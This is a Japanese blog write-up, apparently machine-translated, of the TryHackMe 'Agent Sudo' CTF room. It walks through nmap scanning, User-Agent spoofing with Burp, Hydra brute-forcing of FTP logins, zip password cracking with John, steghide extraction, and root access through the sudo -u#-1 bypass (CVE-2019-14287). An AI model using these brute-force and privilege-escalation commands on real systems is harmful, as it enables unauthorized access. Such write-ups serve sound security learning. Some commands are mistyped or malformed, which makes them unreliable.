TRYHACKME のエージェント須藤

Jan 14 2023
Tryhackme の Agent sudo の初心者パスの挑戦的な部屋 ラボは非常にゆっくりなので、ポート スキャンを待つ必要があります。それでは、学ぶべきことがたくさんあることから始めましょう。

TryhackmeのAgent sudoの初心者パスの挑戦的な部屋

ラボは非常に遅いため、ポート スキャンを待つ必要があります。

それでは、学ぶべきことがたくさんあることから始めましょう。

A) まず、NMAP を行います。

nmap -sV -sC -A 10.10.111.153

      
                

ポート 80 で、どの Web ページが HTTP で実行されているかを調べます。

このページをバイパスするようにユーザー エージェントを変更すると表示されますが、どうすればよいでしょうか?

プロキシ ツール 'Burpsuite' を使用していますが、それは何ですか? 侵入テストに使用されるツール。

burp を使用してリクエストを傍受します 次に、ユーザーエージェントを C に変更します

User-agent を に設定するとC、 にリダイレクトされhttp://10.10.111.153/agent_C_attention.php、次のメッセージが表示されます。

「chris」がシステムのユーザーであるに違いないと仮定しました。

ここで何ができるでしょうか?

これで、ユーザー名が chris であることがわかったので、'Hydra'を使用して力ずくでユーザーのFTP 資格情報を取得できます。

入力する

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.111.153

      
                

FTP クレデンシャルを使用してログインする

ftp 10.10.111.153

      
                

Exiftool または steghide ツールを使用して、画像のメタデータを取得できます。

ファイルをビン ウォークすると、cutie.png に何かが見つかりました。

binwalk -e cutie.png

      
                
which extracted all the hidden files in it.

次に、8702.zip ファイルのパスワードをクラックする必要があります。

zip2john 8702.zip > out.txt
jonh --wordlist=/usr/share/wordlists/rockyou.txt out.txt

      
                

コンテンツを抽出します

7z e 8702.zip

      
                

cat To_agentR.txt

      
                

echo "QXJlYTUx" | base64 -d

それでは、cute-alien.jpg からテキストまたはファイルを抽出しましょう。

steghide extract -sf cute-alien.jpg
# Enter Area51 as passphrase
cat message.txt

      
                

次のステップでは、SSH 資格情報を使用してログインを試みます。

ssh [email protected]

ユーザーフラグを取得しました!

入力を使用して Alien autospy.jpg を取得しようとします

sudo scp [email protected]:Alien_autospy.jpg

ロスウェルエイリアンの検死

ルート フラグを取得するには、自分が持っているパーミッションまたは権限を確認する必要があります

これは少しトリッキーです。最初にコマンドを入力します。

sudo -l

      
                

CVE-2019–14287

権限をエスカレートする

sudo -u#-1 /bin/bash

      
                

すべての回答が揃ったので、送信してみましょう。これで、CTF が正常に完了しました。

挑戦し続け、働き続けてください:)

読んでくれてありがとう!!

Happy Hacking GUYS

Author: Xploit Ayush